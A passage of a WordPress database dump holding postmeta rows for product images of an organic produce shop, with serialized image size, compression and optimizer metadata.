:600;s:6:\"height\";i:600;s:5:\"ratio\";d:0.2452;}s:3:\"end\";i:1591599393;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:38789;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:10967;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:5:\"ratio\";d:0.28270000000000001;}s:3:\"end\";i:1594122826;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:12171;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:4502;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:5:\"ratio\";d:0.36990000000000001;}s:3:\"end\";i:1594122822;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:43546;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:11892;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:5:\"ratio\";d:0.27310000000000001;}s:3:\"end\";i:1594122829;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:6225;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:2936;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:0.47160000000000002;}s:3:\"end\";i:1594122832;}s:12:\"shop_catalog\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}s:21:\"yith-woocompare-image\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:23439;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:6819;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:220;s:6:\"height\";i:154;s:5:\"ratio\";d:0.29089999999999999;}s:3:\"end\";i:1591599402;}}'),(38,173,'siteground_optimizer_optimization_attempts','1'),(39,173,'siteground_optimizer_is_optimized','1'),(40,173,'siteground_optimizer_webp_conversion_attempts','1'),(41,173,'siteground_optimizer_webp_conversion_failed','1'),(43,174,'_wp_attached_file','2020/06/organicc-cheeries.png'),(44,174,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:29:\"2020/06/organicc-cheeries.png\";s:8:\"filesize\";i:28791;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:29:\"organicc-cheeries-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:36615;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:29:\"organicc-cheeries-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5710;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:27:\"organicc-cheeries-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2098;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(45,174,'tiny_compress_images','a:8:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:109648;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:28791;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:5:\"ratio\";d:0.2626;}s:3:\"end\";i:1591599389;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:31565;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:10856;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:5:\"ratio\";d:0.34389999999999998;}s:3:\"end\";i:1594122825;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:10100;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:4208;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:5:\"ratio\";d:0.41660000000000003;}s:3:\"end\";i:1594122822;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:35587;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:11792;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:5:\"ratio\";d:0.33139999999999997;}s:3:\"end\";i:1594122829;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:5353;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:2646;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:0.49430000000000002;}s:3:\"end\";i:1594122832;}s:12:\"shop_catalog\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}s:21:\"yith-woocompare-image\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:19921;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:6840;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:220;s:6:\"height\";i:154;s:5:\"ratio\";d:0.34339999999999998;}s:3:\"end\";i:1591599397;}}'),(46,174,'siteground_optimizer_optimization_attempts','1'),(47,174,'siteground_optimizer_is_optimized','1'),(48,174,'siteground_optimizer_webp_conversion_attempts','1'),(49,174,'siteground_optimizer_webp_conversion_failed','1'),(51,175,'_wp_attached_file','2020/06/organicc-grapes.png'),(52,175,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:27:\"2020/06/organicc-grapes.png\";s:8:\"filesize\";i:52162;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:27:\"organicc-grapes-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:56614;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:27:\"organicc-grapes-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:7987;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:25:\"organicc-grapes-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2659;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(53,175,'tiny_compress_images','a:8:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:191017;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:52162;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:5:\"ratio\";d:0.27310000000000001;}s:3:\"end\";i:1591599388;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:50485;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:16470;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:5:\"ratio\";d:0.32619999999999999;}s:3:\"end\";i:1594122823;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:15342;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:5704;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:5:\"ratio\";d:0.37180000000000002;}s:3:\"end\";i:1594122820;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:56614;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:18095;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:5:\"ratio\";d:0.3196;}s:3:\"end\";i:1594122826;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:7795;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:3341;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:0.42859999999999998;}s:3:\"end\";i:1594122829;}s:12:\"shop_catalog\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}s:21:\"yith-woocompare-image\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:29051;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:9663;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:220;s:6:\"height\";i:154;s:5:\"ratio\";d:0.33260000000000001;}s:3:\"end\";i:1591599398;}}'),(54,175,'siteground_optimizer_optimization_attempts','1'),(55,175,'siteground_optimizer_is_optimized','1'),(56,175,'siteground_optimizer_webp_conversion_attempts','1'),(57,175,'siteground_optimizer_webp_conversion_failed','1'),(59,176,'_wp_attached_file','2020/06/organicc-tomatoes.png'),(60,176,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:29:\"2020/06/organicc-tomatoes.png\";s:8:\"filesize\";i:57558;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:29:\"organicc-tomatoes-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:67772;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:29:\"organicc-tomatoes-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9482;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:27:\"organicc-tomatoes-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3113;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(61,176,'tiny_compress_images','a:8:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:234147;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:57558;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:5:\"ratio\";d:0.24579999999999999;}s:3:\"end\";i:1591599375;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:61446;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:19148;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:5:\"ratio\";d:0.31159999999999999;}s:3:\"end\";i:1594122818;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:18512;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:6932;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:5:\"ratio\";d:0.3745;}s:3:\"end\";i:1594122815;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:68751;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:20759;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:5:\"ratio\";d:0.3019;}s:3:\"end\";i:1594122821;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:9337;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:3958;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:0.4239;}s:3:\"end\";i:1594122824;}s:12:\"shop_catalog\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}s:21:\"yith-woocompare-image\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:36263;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:11684;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:220;s:6:\"height\";i:154;s:5:\"ratio\";d:0.32219999999999999;}s:3:\"end\";i:1591599385;}}'),(62,176,'siteground_optimizer_optimization_attempts','1'),(63,176,'siteground_optimizer_is_optimized','1'),(64,176,'siteground_optimizer_webp_conversion_attempts','1'),(65,176,'siteground_optimizer_webp_conversion_failed','1'),(67,177,'_wp_attached_file','2020/06/organicc-potatoes.png'),(68,177,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:29:\"2020/06/organicc-potatoes.png\";s:8:\"filesize\";i:61341;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:29:\"organicc-potatoes-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:51627;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:29:\"organicc-potatoes-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:6925;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:27:\"organicc-potatoes-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2276;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(69,177,'tiny_compress_images','a:8:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:192379;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:61341;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:5:\"ratio\";d:0.31890000000000002;}s:3:\"end\";i:1591599374;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:47353;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:18983;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:5:\"ratio\";d:0.40089999999999998;}s:3:\"end\";i:1594122814;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:13681;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:6037;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:5:\"ratio\";d:0.44130000000000003;}s:3:\"end\";i:1594122811;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:52595;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:20662;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:5:\"ratio\";d:0.39290000000000003;}s:3:\"end\";i:1594122817;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:6825;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:3368;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:0.49349999999999999;}s:3:\"end\";i:1594122820;}s:12:\"shop_catalog\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}s:21:\"yith-woocompare-image\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:27329;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:10968;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:220;s:6:\"height\";i:154;s:5:\"ratio\";d:0.40129999999999999;}s:3:\"end\";i:1591599383;}}'),(70,177,'siteground_optimizer_optimization_attempts','1'),(71,177,'siteground_optimizer_is_optimized','1'),(72,177,'siteground_optimizer_webp_conversion_attempts','1'),(73,177,'siteground_optimizer_webp_conversion_failed','1'),(75,178,'_wp_attached_file','2020/06/organicc-peas.png'),(76,178,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:25:\"2020/06/organicc-peas.png\";s:8:\"filesize\";i:53882;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:25:\"organicc-peas-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:59892;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:25:\"organicc-peas-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8246;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:23:\"organicc-peas-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2635;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(77,178,'tiny_compress_images','a:8:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:204179;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:53882;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:5:\"ratio\";d:0.26390000000000002;}s:3:\"end\";i:1591599373;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:52848;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:17711;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:5:\"ratio\";d:0.33510000000000001;}s:3:\"end\";i:1594122813;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:16036;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:5948;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:5:\"ratio\";d:0.37090000000000001;}s:3:\"end\";i:1594122810;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:60024;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:19368;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:5:\"ratio\";d:0.32269999999999999;}s:3:\"end\";i:1594122816;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:8004;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:3371;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:0.42120000000000002;}s:3:\"end\";i:1594122819;}s:12:\"shop_catalog\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}s:21:\"yith-woocompare-image\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:31890;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:10639;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:220;s:6:\"height\";i:154;s:5:\"ratio\";d:0.33360000000000001;}s:3:\"end\";i:1591599383;}}'),(78,178,'siteground_optimizer_optimization_attempts','1'),(79,178,'siteground_optimizer_is_optimized','1'),(80,178,'siteground_optimizer_webp_conversion_attempts','1'),(81,178,'siteground_optimizer_webp_conversion_failed','1'),(83,180,'_wp_attached_file','2020/06/organicc-green-chillies.png'),(84,180,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:35:\"2020/06/organicc-green-chillies.png\";s:8:\"filesize\";i:30095;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:35:\"organicc-green-chillies-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:35552;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:35:\"organicc-green-chillies-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5326;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:33:\"organicc-green-chillies-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1800;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(85,180,'tiny_compress_images','a:8:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:31628;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:30095;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:5:\"ratio\";d:0.95150000000000001;}s:3:\"end\";i:1594122807;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:30469;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:10260;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:5:\"ratio\";d:0.3367;}s:3:\"end\";i:1594122813;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:9355;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:3724;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:5:\"ratio\";d:0.39810000000000001;}s:3:\"end\";i:1594122810;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:34880;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:11564;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:5:\"ratio\";d:0.33150000000000002;}s:3:\"end\";i:1594122815;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:4635;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:2372;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:0.51180000000000003;}s:3:\"end\";i:1594122818;}s:12:\"shop_catalog\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}s:21:\"yith-woocompare-image\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:18721;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:6383;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:220;s:6:\"height\";i:154;s:5:\"ratio\";d:0.34100000000000003;}s:3:\"end\";i:1591599378;}}'),(86,180,'siteground_optimizer_optimization_attempts','1'),(87,180,'siteground_optimizer_is_optimized','1'),(88,180,'siteground_optimizer_webp_conversion_attempts','1'),(89,180,'siteground_optimizer_webp_conversion_failed','1'),(91,182,'_wp_attached_file','2020/06/organicc-brocolli.png'),(92,182,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:29:\"2020/06/organicc-brocolli.png\";s:8:\"filesize\";i:87670;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:29:\"organicc-brocolli-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:82401;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:29:\"organicc-brocolli-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9294;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:27:\"organicc-brocolli-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2878;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(93,182,'tiny_compress_images','a:8:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:310181;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:87670;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:5:\"ratio\";d:0.28260000000000002;}s:3:\"end\";i:1591599369;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:74631;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:24336;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:5:\"ratio\";d:0.3261;}s:3:\"end\";i:1594122810;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:19949;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:7228;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:5:\"ratio\";d:0.36230000000000001;}s:3:\"end\";i:1594122806;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:83315;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:27220;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:5:\"ratio\";d:0.32669999999999999;}s:3:\"end\";i:1594122813;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:9309;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:3943;s:4:\"type\";s:9:\"